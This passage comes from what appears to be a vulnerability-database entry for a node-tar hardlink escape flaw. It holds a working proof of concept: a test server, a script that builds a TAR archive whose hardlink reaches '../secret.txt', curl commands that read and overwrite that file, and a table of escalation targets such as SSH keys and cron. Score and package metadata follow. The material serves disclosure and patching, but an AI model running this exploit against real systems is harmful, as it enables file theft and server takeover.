      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));
      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });
      res.end('Extracted\n');
    });
  } else if (req.method === 'GET' && req.url === '/read') {
    // Simulates app serving extracted files (e.g., file download, static assets)
    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
    if (fs.existsSync(targetPath)) {
      res.end(fs.readFileSync(targetPath));
    } else {
      res.end('File not found\n');
    }
  } else if (req.method === 'POST' && req.url === '/write') {
    // Simulates app writing to extracted file (e.g., config update, log append)
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', () => {
      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
      if (fs.existsSync(targetPath)) {
        fs.writeFileSync(targetPath, Buffer.concat(chunks));
        res.end('Written\n');
      } else {
        res.end('File not found\n');
      }
    });
  } else {
    res.end('POST /upload, GET /read, or POST /write\n');
  }
}).listen(PORT, () => console.log(`http://localhost:${PORT}`));
```

**create-malicious-tar.js** (attacker creates exploit TAR)
```javascript
const fs = require('fs');

function tarHeader(name, type, linkpath = '', size = 0) {
  const b = Buffer.alloc(512, 0);
  b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);
  b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);
  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);
  b.write('        ', 148);
  b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;
  if (linkpath) b.write(linkpath, 157);
  b.write('ustar\x00', 257); b.write('00', 263);
  let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];
  b.write(sum.toString(8).padStart(6, '0') + '\x00 ', 148);
  return b;
}

// Hardlink escapes to parent directory's secret.txt
fs.writeFileSync('malicious.tar', Buffer.concat([
  tarHeader('d/', 'dir'),
  tarHeader('d/x', 'link', '../secret.txt'),
  Buffer.alloc(1024)
]));
console.log('Created malicious.tar');
```

#### Run

```bash
# Setup
npm install
echo "DATABASE_PASSWORD=supersecret123" > secret.txt

# Terminal 1: Start server
node server.js

# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload

# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123

# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write

# Confirm secret.txt was modified
cat secret.txt
```
### Impact

An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:

**Immediate (Read Attack):** If the application serves extracted files, attacker can read any file readable by the process.

**Conditional (Write Attack):** If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.

### Remote Code Execution / Server Takeover

| Attack Vector | Target File | Result |
|--------------|-------------|--------|
| SSH Access | `~/.ssh/authorized_keys` | Direct shell access to server |
| Cron Backdoor | `/etc/cron.d/*`, `~/.crontab` | Persistent code execution |
| Shell RC Files | `~/.bashrc`, `~/.profile` | Code execution on user login |
| Web App Backdoor | Application `.js`, `.php`, `.py` files | Immediate RCE via web requests |
| Systemd Services | `/etc/systemd/system/*.service` | Code execution on service restart |
| User Creation | `/etc/passwd` (if running as root) | Add new privileged user |

## Data Exfiltration & Corruption

1. **Overwrite arbitrary files** via hardlink escape + subsequent write operations
2. **Read sensitive files** by creating hardlinks that point outside extraction directory
3. **Corrupt databases** and application state
4. **Steal credentials** from config files, `.env`, secrets
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-24842
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04676
published_at 2026-04-04T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04653
published_at 2026-04-02T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05812
published_at 2026-04-24T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05664
published_at 2026-04-13T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05858
published_at 2026-04-29T12:55:00Z
5
value 0.00021
scoring_system epss
scoring_elements 0.05849
published_at 2026-04-26T12:55:00Z
6
value 0.00021
scoring_system epss
scoring_elements 0.0562
published_at 2026-04-16T12:55:00Z
7
value 0.00021
scoring_system epss
scoring_elements 0.05635
published_at 2026-04-07T12:55:00Z
8
value 0.00021
scoring_system epss
scoring_elements 0.05672
published_at 2026-04-08T12:55:00Z
9
value 0.00021
scoring_system epss
scoring_elements 0.05699
published_at 2026-04-09T12:55:00Z
10
value 0.00021
scoring_system epss
scoring_elements 0.05678
published_at 2026-04-11T12:55:00Z
11
value 0.00021
scoring_system epss
scoring_elements 0.0567
published_at 2026-04-12T12:55:00Z
12
value 0.00021
scoring_system epss
scoring_elements 0.0578
published_at 2026-04-21T12:55:00Z
13
value 0.00021
scoring_system epss
scoring_elements 0.05631
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-24842
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/isaacs/node-tar
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar
5
reference_url https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/
url https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
6
reference_url https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/
url https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-24842
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-24842
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2433645
reference_id 2433645
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2433645
9
reference_url https://github.com/advisories/GHSA-34x7-hfp2-rc4v
reference_id GHSA-34x7-hfp2-rc4v
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-34x7-hfp2-rc4v
10
reference_url https://access.redhat.com/errata/RHSA-2026:2900
reference_id RHSA-2026:2900
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2900
11
reference_url https://access.redhat.com/errata/RHSA-2026:5447
reference_id RHSA-2026:5447
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5447
12
reference_url https://access.redhat.com/errata/RHSA-2026:6192
reference_id RHSA-2026:6192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6192
fixed_packages
0
url pkg:deb/debian/node-tar@0?distro=trixie
purl pkg:deb/debian/node-tar@0?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie
1
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-qunt-xms1-a3cc
5
vulnerability VCID-xqpk-t1d2-yqak
6
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie
2
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u3%3Fdistro=trixie
3
url pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
purl pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie
4
url pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-jj22-rfbv-bkg3
3
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie
5
url pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie
aliases CVE-2026-24842, GHSA-34x7-hfp2-rc4v
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xqpk-t1d2-yqak
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie